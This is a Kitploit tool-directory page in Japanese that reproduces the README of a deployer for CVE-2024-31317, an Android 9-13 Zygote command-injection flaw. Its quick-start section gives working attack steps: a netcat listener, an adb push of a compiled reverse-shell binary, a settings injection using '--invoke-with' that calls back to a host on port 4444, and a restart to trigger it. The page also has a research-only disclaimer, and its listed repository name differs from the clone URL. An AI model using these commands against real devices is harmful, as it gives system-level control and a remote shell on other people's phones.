Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-31317-Deployer — CVE-2024-31317 | Kitploit
ツール/GitHubGitHub/kalibb/cve-2024-31317-deployer
Androidセキュリティ脆弱性分析エクスプロイトモバイルセキュリティコマンド&コントロール学習と教育ペイロード開発バイナリエクスプロイト
GitHubkalibb/cve-2024-31317-deployer

CVE-2024-31317-Deployer

CVE-2024-31317

リポジトリを見る
16ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2024-31317 Deployer

License Android Status

🔒 セキュリティ研究に関する声明

本プロジェクトはセキュリティ研究および教育目的でのみ使用されます。本ツールを使用した未承認のテストは違法です。著者は一切の悪用や損害について責任を負いません。

📋 概要

CVE-2024-31317 は、Android 9 から Android 13 のデバイスに影響を与える深刻なセキュリティ脆弱性であり、WRITE_SECURE_SETTINGS 権限を持つアプリケーションがコマンドインジェクションを通じてシステムレベルの権限実行を取得できるようにします。

本プロジェクトは、この脆弱性の詳細な技術分析、概念実証コード、および自動化デプロイツールを提供します。

✨ 主な特徴

  • 📱 Android 9-13 の全バージョンをサポート
  • 🛠️ 自動化デプロイスクリプト
  • 🔄 リバースシェル接続
  • 📊 詳細な技術ドキュメント
  • 🎯 モジュール設計

🐛 脆弱性の詳細

  • CVE ID: CVE-2024-31317
  • 脆弱性タイプ: コマンドインジェクション
  • 深刻度: 高 (High)
  • CVSS スコア: 7.8
  • 影響を受けるコンポーネント: Android Zygote プロセス
  • 修正状況: 2024年6月の Android セキュリティパッチで修正済み

🎯 影響範囲

影響を受けるバージョン

  • ✅ Android 9-13

影響を受けないバージョン

  • ❌ Android 14+ (修正済み)
  • ❌ 2024年6月以降のセキュリティパッチがインストールされたデバイス

📁 プロジェクト構造

root@kitploit:~
CVE-2024-31317-Deployer/
├── README.md
├── LICENSE
├── VULNERABILITY_ANALYSIS.md
├── reverse_shell.c
├── compile.sh
├── payloads/
├── scripts/
└── docs/

🚀 クイックスタート

1. プロジェクトのクローン

root@kitploit:~
git clone https://github.com/fcy10012/CVE-2024-31317-Deployer.git
cd CVE-2024-31317-Deployer

2. Payload のコンパイル

root@kitploit:~
chmod +x compile.sh
./compile.sh

3. デプロイ

root@kitploit:~
# 启动监听器
nc -lvnp 4444

# 推送并执行
adb push bin/reverse_shell_arm64 /data/local/tmp/reverse_shell
adb shell chmod 755 /data/local/tmp/reverse_shell

# 注入payload
adb shell settings put global hidden_api_blacklist_exemptions "L*\n--invoke-with /data/local/tmp/reverse_shell 192.168.1.100 4444"

# 触发漏洞
adb shell stop && adb shell start

📚 ドキュメント

  • 詳細な技術分析
  • Payload 使用説明
  • 完全な使用チュートリアル

⚠️ 免責事項

本プロジェクトはセキュリティ研究および教育目的のみで使用されます。本ツールを使用することで、以下に同意したものとみなされます:

  • 適用されるすべての法令を遵守すること
  • 合法的なセキュリティ研究のみに使用すること
  • お客様の行動に対して全責任を負うこと

📜 ライセンス

本プロジェクトは MIT ライセンスに基づいています - 詳細は LICENSE ファイルを参照してください

👨‍💻 著者

fcy10012 - GitHub

🙏 謝辞

参考プロジェクト: WebLDix/CVE-2024-31317-PoC-Deployer


⭐ このプロジェクトがお役に立てば、スターを付けてください!

ツールをダウンロード